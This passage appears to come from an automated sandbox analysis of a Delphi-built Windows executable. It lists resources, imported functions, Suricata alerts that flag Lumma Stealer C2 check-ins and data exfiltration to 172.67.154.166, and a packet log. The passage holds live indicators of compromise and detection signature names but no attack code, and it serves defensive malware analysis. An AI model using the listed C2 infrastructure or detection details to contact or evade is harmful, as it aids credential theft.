RT_BITMAP	0x151778	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380			0.46487603305785125
RT_BITMAP	0x15195c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0x151b2c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39870689655172414
RT_BITMAP	0x151cfc	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.4245689655172414
RT_BITMAP	0x151ecc	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5021551724137931
RT_BITMAP	0x15209c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5064655172413793
RT_BITMAP	0x15226c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0x15243c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5344827586206896
RT_BITMAP	0x15260c	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0x1527dc	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.4870689655172414
RT_BITMAP	0x1528c4	0x4b8	Device independent bitmap graphic, 12 x 12 x 8, image size 144, resolution 2866 x 2866 px/m	English	United States	0.35596026490066224
RT_BITMAP	0x152d7c	0x4b8	Device independent bitmap graphic, 12 x 12 x 8, image size 144, resolution 2866 x 2866 px/m	English	United States	0.3518211920529801
RT_BITMAP	0x153234	0x4b8	Device independent bitmap graphic, 12 x 12 x 8, image size 144, resolution 2866 x 2866 px/m	English	United States	0.34271523178807944
RT_BITMAP	0x1536ec	0x4b8	Device independent bitmap graphic, 12 x 12 x 8, image size 144, resolution 2882 x 2882 px/m	English	United States	0.3609271523178808
RT_BITMAP	0x153ba4	0x4b8	Device independent bitmap graphic, 12 x 12 x 8, image size 144, resolution 2866 x 2866 px/m	English	United States	0.36423841059602646
RT_BITMAP	0x15405c	0x628	Device independent bitmap graphic, 32 x 16 x 8, image size 512, resolution 2913 x 2913 px/m	English	United States	0.32741116751269034
RT_BITMAP	0x154684	0x628	Device independent bitmap graphic, 32 x 16 x 8, image size 512, resolution 2913 x 2913 px/m	English	United States	0.33756345177664976
RT_BITMAP	0x154cac	0x628	Device independent bitmap graphic, 32 x 16 x 8, image size 512, resolution 2898 x 2898 px/m	English	United States	0.30774111675126903
RT_BITMAP	0x1552d4	0x628	Device independent bitmap graphic, 32 x 16 x 8, image size 512, resolution 2913 x 2913 px/m	English	United States	0.39403553299492383
RT_BITMAP	0x1558fc	0x628	Device independent bitmap graphic, 32 x 16 x 8, image size 512, resolution 2882 x 2882 px/m	English	United States	0.4346446700507614
RT_BITMAP	0x155f24	0x628	Device independent bitmap graphic, 32 x 16 x 8, image size 512, resolution 2913 x 2913 px/m	English	United States	0.32741116751269034
RT_BITMAP	0x15654c	0x628	Device independent bitmap graphic, 32 x 16 x 8, image size 512, resolution 2913 x 2913 px/m	English	United States	0.3483502538071066
RT_BITMAP	0x156b74	0x628	Device independent bitmap graphic, 32 x 16 x 8, image size 512, resolution 2898 x 2898 px/m	English	United States	0.30710659898477155
RT_BITMAP	0x15719c	0x628	Device independent bitmap graphic, 32 x 16 x 8, image size 512, resolution 2913 x 2913 px/m	English	United States	0.33121827411167515
RT_BITMAP	0x1577c4	0x628	Device independent bitmap graphic, 32 x 16 x 8, image size 512, resolution 2898 x 2898 px/m	English	United States	0.30710659898477155
RT_ICON	0x157dec	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600, resolution 2835 x 2835 px/m	English	United States	0.5161825726141079
RT_DIALOG	0x15a394	0x52	data			0.7682926829268293
RT_STRING	0x15a3e8	0x30c	data			0.3230769230769231
RT_STRING	0x15a6f4	0x450	data			0.35144927536231885
RT_STRING	0x15ab44	0x358	data			0.37616822429906543
RT_STRING	0x15ae9c	0x404	data			0.38715953307393
RT_STRING	0x15b2a0	0x3f8	data			0.3543307086614173
RT_STRING	0x15b698	0x310	data			0.39285714285714285
RT_STRING	0x15b9a8	0x324	data			0.43159203980099503
RT_STRING	0x15bccc	0x3dc	data			0.4271255060728745
RT_STRING	0x15c0a8	0x6a4	data			0.20705882352941177
RT_STRING	0x15c74c	0x884	data			0.13669724770642203
RT_STRING	0x15cfd0	0x870	data			0.13657407407407407
RT_STRING	0x15d840	0x9bc	data			0.13964686998394862
RT_STRING	0x15e1fc	0x2b0	data			0.373546511627907
RT_STRING	0x15e4ac	0x33c	data			0.4082125603864734
RT_STRING	0x15e7e8	0x260	data			0.3618421052631579
RT_STRING	0x15ea48	0x1bc	data			0.44594594594594594
RT_STRING	0x15ec04	0x144	data			0.4783950617283951
RT_STRING	0x15ed48	0x11c	data			0.5598591549295775
RT_STRING	0x15ee64	0x11c	data			0.5845070422535211
RT_STRING	0x15ef80	0x2e0	data			0.40217391304347827
RT_STRING	0x15f260	0x1ac	data			0.4158878504672897
RT_STRING	0x15f40c	0x140	StarOffice Gallery theme o, 536901888 objects, 1st u			0.525
RT_STRING	0x15f54c	0x118	data			0.5321428571428571
RT_STRING	0x15f664	0x298	data			0.4578313253012048
RT_STRING	0x15f8fc	0x470	data			0.3732394366197183
RT_STRING	0x15fd6c	0x268	data			0.4805194805194805
RT_STRING	0x15ffd4	0x204	data			0.36046511627906974
RT_STRING	0x1601d8	0x10c	data			0.585820895522388
RT_STRING	0x1602e4	0x350	data			0.43160377358490565
RT_STRING	0x160634	0x1e8	data			0.5061475409836066
RT_STRING	0x16081c	0xec	data			0.597457627118644
RT_STRING	0x160908	0x1a8	data			0.5
RT_STRING	0x160ab0	0x2b8	data			0.4454022988505747
RT_STRING	0x160d68	0x3f8	data			0.37401574803149606
RT_STRING	0x161160	0x360	data			0.4027777777777778
RT_STRING	0x1614c0	0x378	data			0.3367117117117117
RT_STRING	0x161838	0x410	data			0.3798076923076923
RT_STRING	0x161c48	0xec	data			0.4788135593220339
RT_STRING	0x161d34	0xd0	data			0.5673076923076923
RT_STRING	0x161e04	0x29c	data			0.4535928143712575
RT_STRING	0x1620a0	0x3e8	data			0.316
RT_STRING	0x162488	0x374	data			0.3766968325791855
RT_STRING	0x1627fc	0x314	data			0.3629441624365482
RT_RCDATA	0x162b10	0x10	data			1.5
RT_RCDATA	0x162b20	0xadc	data			0.5910071942446044
RT_RCDATA	0x1635fc	0x2d0	Delphi compiled form 'TframePage1'			0.6263888888888889
RT_RCDATA	0x1638cc	0x70d	Delphi compiled form 'TframePage2'			0.4121883656509695
RT_RCDATA	0x163fdc	0x3db	Delphi compiled form 'TframePage3'			0.5481256332320162
RT_RCDATA	0x1643b8	0xbe2	Delphi compiled form 'TframePage4'			0.23372781065088757
RT_RCDATA	0x164f9c	0x2b4	Delphi compiled form 'TframePage5'			0.5722543352601156
RT_RCDATA	0x165250	0x2ec	Delphi compiled form 'TframePage6'			0.5628342245989305
RT_RCDATA	0x16553c	0x20d	Delphi compiled form 'TframePage7'			0.5619047619047619
RT_RCDATA	0x16574c	0x225	Delphi compiled form 'TfrmClosing'			0.6193078324225865
RT_RCDATA	0x165974	0x787	Delphi compiled form 'TfrmConfigure'			0.4193046185781007
RT_RCDATA	0x1660fc	0x5355	Delphi compiled form 'TfrmLUMain'			0.7868560446256972
RT_RCDATA	0x16b454	0x76b	Delphi compiled form 'TfrmReport'			0.4296998420221169
RT_RCDATA	0x16bbc0	0x12ec	Delphi compiled form 'TRzFrmCustomizeToolbar'			0.2698183319570603
RT_GROUP_CURSOR	0x16ceac	0x14	Lotus unknown worksheet or configuration, revision 0x1	German	Germany	1.25
RT_GROUP_CURSOR	0x16cec0	0x14	Lotus unknown worksheet or configuration, revision 0x1	German	Germany	1.3
RT_GROUP_CURSOR	0x16ced4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x16cee8	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x16cefc	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x16cf10	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x16cf24	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x16cf38	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x16cf4c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x16cf60	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_ICON	0x16cf74	0x14	data	English	United States	1.15
RT_VERSION	0x16cf88	0x350	data	English	United States	0.45047169811320753
RT_MANIFEST	0x16d2d8	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegSetValueExA, RegQueryValueExW, RegQueryValueExA, RegQueryInfoKeyA, RegOpenKeyExW, RegOpenKeyExA, RegFlushKey, RegEnumValueA, RegCreateKeyExA, RegCreateKeyA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, LookupAccountNameA, GetUserNameA, AdjustTokenPrivileges
kernel32.dll	lstrlenW, lstrlenA, lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, UnmapViewOfFile, TerminateProcess, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryA, SetComputerNameA, ResumeThread, ResetEvent, ReadFile, QueryPerformanceFrequency, QueryPerformanceCounter, OpenProcess, MultiByteToWideChar, MulDiv, MoveFileA, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, IsBadReadPtr, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalMemoryStatus, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetWindowsDirectoryA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadPriority, GetThreadLocale, GetTempPathA, GetSystemPowerStatus, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProfileStringA, GetProcAddress, GetOEMCP, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetEnvironmentVariableA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryA, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExpandEnvironmentStringsA, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateMutexA, CreateFileA, CreateEventA, CreateDirectoryA, CompareStringA, CloseHandle
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, StartPage, StartDocA, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetTextAlign, SetStretchBltMode, SetROP2, SetPixelFormat, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetViewportOrgEx, GetTextMetricsA, GetTextExtentPointA, GetTextExtentPoint32A, GetTextAlign, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExtTextOutA, ExcludeClipRect, EndPage, EndDoc, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateICA, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, ChoosePixelFormat, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, TabbedTextOutA, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetSysColors, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetKeyboardState, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetClassLongA, SetCaretPos, SetCaretBlinkTime, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OpenClipboard, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MessageBeep, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, IsCharAlphaNumericA, IsCharAlphaA, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetUpdateRect, GetTopWindow, GetTabbedTextExtentA, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDoubleClickTime, GetDialogBaseUnits, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCaretPos, GetCaretBlinkTime, GetCapture, GetActiveWindow, FrameRect, FindWindowExA, FindWindowA, FillRect, ExitWindowsEx, EqualRect, EnumWindows, EnumThreadWindows, EnumDisplaySettingsA, EnumClipboardFormats, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DrawAnimatedRects, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, CloseClipboard, ClientToScreen, CheckMenuItem, ChangeDisplaySettingsA, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
ole32.dll	IsEqualGUID
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll	CreateStreamOnHGlobal, CoTaskMemFree, CoCreateInstance, CoUninitialize, CoInitializeEx, CoInitialize
oleaut32.dll	CreateErrorInfo, GetErrorInfo, SetErrorInfo, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
winspool.drv	OpenPrinterA, EnumPrintersA, DocumentPropertiesA, ClosePrinter
shell32.dll	Shell_NotifyIconA, ShellExecuteA, SHGetFileInfoA
shell32.dll	SHGetSpecialFolderPathA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
gdiplus.dll	GdipGetImagePixelFormat, GdipSetPathGradientPresetBlend, GdipSetPathGradientWrapMode, GdipSetLineGammaCorrection, GdipSetImageAttributesColorKeys, GdipDisposeImageAttributes, GdipCreateImageAttributes, GdipCreateTexture, GdipResetClip, GdipBitmapGetPixel, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipDeleteRegion, GdipCreateRegionPath, GdipCreateRegionRect, GdipSetClipRegion, GdipSetPenDashStyle, GdipGetImageHeight, GdipGetImageWidth, GdipDisposeImage, GdipLoadImageFromStreamICM, GdipLoadImageFromStream, GdipFillPath, GdipDrawLine, GdipDrawRectangle, GdipDrawImageRectRect, GdipDrawImageRect, GdipGetImageRawFormat, GdipDeleteStringFormat, GdipCreateStringFormat, GdipMeasureString, GdipDrawString, GdipDeleteFont, GdipCreateFont, GdipDeleteFontFamily, GdipCreateFontFamilyFromName, GdipFillRectangle, GdipDrawPath, GdipSetTextRenderingHint, GdipGetSmoothingMode, GdipSetSmoothingMode, GdipDeleteGraphics, GdipCreateFromHDC, GdipDeletePen, GdipCreatePen1, GdipGetPathGradientPointCount, GdipSetPathGradientCenterPoint, GdipSetPathGradientSurroundColorsWithCount, GdipSetPathGradientCenterColor, GdipCreatePathGradientFromPath, GdipResetPath, GdipCreateLineBrushFromRectWithAngle, GdipCreateLineBrushFromRect, GdipCreateSolidFill, GdipCreateHatchBrush, GdipDeleteBrush, GdipAddPathEllipse, GdipAddPathArc, GdipAddPathLine, GdipClosePathFigure, GdipDeletePath, GdipCreatePath, GdiplusShutdown, GdiplusStartup, GdipFree, GdipAlloc
kernel32.dll	GetVersionExA
wsock32.dll	WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
kernel32.dll	SetNamedPipeHandleState, WaitNamedPipeA, GetLastError, CreateFileA, CloseHandle, ReadFile, WriteFile
wsock32.dll	connect, htons, gethostbyname, inet_addr, socket, WSAStartup, WSACleanup, closesocket, shutdown, select, __WSAFDIsSet, WSAGetLastError, recv, send, ioctlsocket, setsockopt

Possible Origin

Language of compilation system	Country where language is spoken	Map
German	Germany
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-26T12:08:09.463786+0100	2058530	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (erectystickj .click)	1	192.168.2.6	60443	1.1.1.1	53	UDP
2024-12-26T12:08:11.096556+0100	2058531	ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI)	1	192.168.2.6	49713	172.67.154.166	443	TCP
2024-12-26T12:08:11.096556+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49713	172.67.154.166	443	TCP
2024-12-26T12:08:11.871049+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49713	172.67.154.166	443	TCP
2024-12-26T12:08:11.871049+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49713	172.67.154.166	443	TCP
2024-12-26T12:08:13.190867+0100	2058531	ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI)	1	192.168.2.6	49719	172.67.154.166	443	TCP
2024-12-26T12:08:13.190867+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49719	172.67.154.166	443	TCP
2024-12-26T12:08:13.972552+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49719	172.67.154.166	443	TCP
2024-12-26T12:08:13.972552+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49719	172.67.154.166	443	TCP
2024-12-26T12:08:15.669606+0100	2058531	ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI)	1	192.168.2.6	49725	172.67.154.166	443	TCP
2024-12-26T12:08:15.669606+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49725	172.67.154.166	443	TCP
2024-12-26T12:08:16.517651+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	49725	172.67.154.166	443	TCP
2024-12-26T12:08:17.916143+0100	2058531	ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI)	1	192.168.2.6	49734	172.67.154.166	443	TCP
2024-12-26T12:08:17.916143+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49734	172.67.154.166	443	TCP
2024-12-26T12:08:20.350582+0100	2058531	ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI)	1	192.168.2.6	49740	172.67.154.166	443	TCP
2024-12-26T12:08:20.350582+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49740	172.67.154.166	443	TCP
2024-12-26T12:08:22.967197+0100	2058531	ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI)	1	192.168.2.6	49751	172.67.154.166	443	TCP
2024-12-26T12:08:22.967197+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49751	172.67.154.166	443	TCP
2024-12-26T12:08:26.133192+0100	2058531	ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI)	1	192.168.2.6	49757	172.67.154.166	443	TCP
2024-12-26T12:08:26.133192+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49757	172.67.154.166	443	TCP
2024-12-26T12:08:30.912448+0100	2058531	ET MALWARE Observed Win32/Lumma Stealer Related Domain (erectystickj .click in TLS SNI)	1	192.168.2.6	49768	172.67.154.166	443	TCP
2024-12-26T12:08:30.912448+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	49768	172.67.154.166	443	TCP
2024-12-26T12:08:31.742077+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49768	172.67.154.166	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 12:08:09.775507927 CET	49713	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:09.775564909 CET	443	49713	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:09.775687933 CET	49713	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:09.779289007 CET	49713	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:09.779304028 CET	443	49713	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:11.096343994 CET	443	49713	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:11.096555948 CET	49713	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:11.099143982 CET	49713	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:11.099157095 CET	443	49713	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:11.099433899 CET	443	49713	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:11.144813061 CET	49713	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:11.150898933 CET	49713	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:11.150923014 CET	49713	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:11.151058912 CET	443	49713	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:11.871078968 CET	443	49713	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:11.871198893 CET	443	49713	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:11.871335030 CET	49713	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:11.874043941 CET	49713	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:11.874070883 CET	443	49713	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:11.874083996 CET	49713	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:11.874090910 CET	443	49713	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:11.885212898 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:11.885288000 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:11.885373116 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:11.885725021 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:11.885756016 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:13.190718889 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:13.190866947 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:13.192825079 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:13.192836046 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:13.193114042 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:13.194581985 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:13.194607019 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:13.194662094 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:13.972563028 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:13.972618103 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:13.972655058 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:13.972687006 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:13.972728968 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:13.972750902 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:13.972764969 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:13.980627060 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:13.980659962 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:13.980727911 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:13.980735064 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:13.980811119 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:13.989044905 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:13.997560024 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:13.997675896 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:13.997683048 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:14.051106930 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:14.092267990 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:14.144850969 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:14.144872904 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:14.182848930 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:14.183012962 CET	49719	443	192.168.2.6	172.67.154.166
Dec 26, 2024 12:08:14.183022976 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:14.186655045 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:14.186748981 CET	443	49719	172.67.154.166	192.168.2.6
Dec 26, 2024 12:08:14.186772108 CET	49719	443	192.168.2.6	172.67.154.166
